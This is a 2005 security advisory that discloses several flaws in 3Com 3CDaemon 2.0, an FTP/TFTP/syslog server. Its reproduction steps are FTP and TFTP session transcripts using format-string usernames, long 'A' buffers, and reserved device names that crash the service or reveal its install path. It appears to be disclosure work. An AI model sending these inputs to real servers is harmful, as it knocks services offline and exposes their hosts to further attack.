ad20041011.txt

`3Com 3CDaemon Multiple Vulnerabilities   
  
By Sowhat  
04.JAN.2005  
  
http://secway.org/advisory/ad20041011.txt  
[I.T.S] Security Research Team  
  
  
Product Affected:  
  
3Com 3CDaemon 2.0 revision 10   
  
Vendor:  
  
www.3Com.com  
  
  
(1) BACKGROUD  
  
3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows   
  
platforms, developed by dan_gill@3Com.   
  
For more information,  
http://support.3com.com/software/utilities_for_windows_32_bit.htm  
ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip  
  
3CDaemon is full of holes,ISS and Wang Ning <[email protected]> has already   
  
reported some bugz about 3CDaemon  
(see: http://xforce.iss.net/xforce/xfdb/8970  
http://www.securityfocus.org/bid/11944  
)  
  
And I doucument some other well-known bugz here again :)  
  
  
(2) Details  
  
Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows  
attackers  
  
to execute arbitrary command as the user running 3CDaemon (usually   
  
Administrator).Some of these Vulnerabilities didnt need a valid username and   
  
password to login.  
  
There are several vulnerabilies  
  
1.TFTP Reserved Device Name Denial of Service  
  
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn  
The 3CDaemon will be crashed with some msgs like   
"Microsoft Visual C++ Runtime library"  
"Runtime Error!"  
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "  
"abnormal program termination".   
  
2.FTP Username Format String vulnerability  
  
H:\>ftp 192.168.0.1  
Connected to 192.168.0.1.  
220 3Com 3CDaemon FTP Server Version 2.0  
User (192.168.0.1:(none)): %n  
Connection closed by remote host.  
  
OR:  
H:\>ftp 192.168.0.1  
Connected to 192.168.0.1.  
220 3Com 3CDaemon FTP Server Version 2.0  
User (192.168.0.1:(none)): %s  
331 User name ok, need password  
Password:[anythinghere]  
530 Login access denied  
Login failed.  
ftp>  
  
And then the 3CDaemon is dead.  
  
3.FTP long Username Buffer overflow  
  
D:\WINDOWS\system32>ftp 192.168.0.1  
Connected to 192.168.0.1.  
220 3Com 3CDaemon FTP Server Version 2.0  
User (192.168.0.1:(none)):  
501 Invalid or missing parameters  
Login failed.  
ftp> user AAA..[about 241 A here]...AAAAA  
Connection closed by remote host.  
  
4.Multiple FTP command long parameter Buffer overflow  
Including:cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD, and so on  
(Maybe this is what ISS's Advisory talking about)  
  
ftp> cd AAA..[about 398 A here]...AAAAA  
Connection closed by remote host.  
ftp>  
  
ftp> ls AAA..[about 247 A here]...AAAAA  
200 PORT command successful.  
Connection closed by remote host.  
  
ftp> put 1.txt AAA..[about 247 A here]...AAAAA  
200 PORT command successful.  
532 Need account for storing files  
Connection closed by remote host.  
  
It seems that the length of the "A" is different from every command.  
  
5.Multiple FTP command Format string  
Including:cd,delete,rename,rmdir,literal,stat,CWD, and so on  
  
230 User logged in  
ftp> cd %n  
Connection closed by remote host.  
ftp>   
  
  
6.Multiple FTP command Reserved Device Name Information Leak  
Including cd,and so on  
  
The following command will disclosure the physical path of the 3cdaemon  
  
ftp> cd aux  
550 aux : C:/3cdaemon/aux is not a directory!  
ftp> cd lpt1  
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!  
  
and also ,CD an exsiting filename will disclosure physical path too.  
  
ftp> cd toolz.rar  
550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!  
  
There are still some other boring bugz ,but it's enough : >  
  
(3) WORKAROUND  
  
Workaroud ? No......  
  
(4) Vendor Response  
  
Since it seems that 3com didnt maintained 3CDaemon for a long long time ,I dint   
contact them :)  
  
http://secway.org  
Thank to all the members of ITS Security Team  
`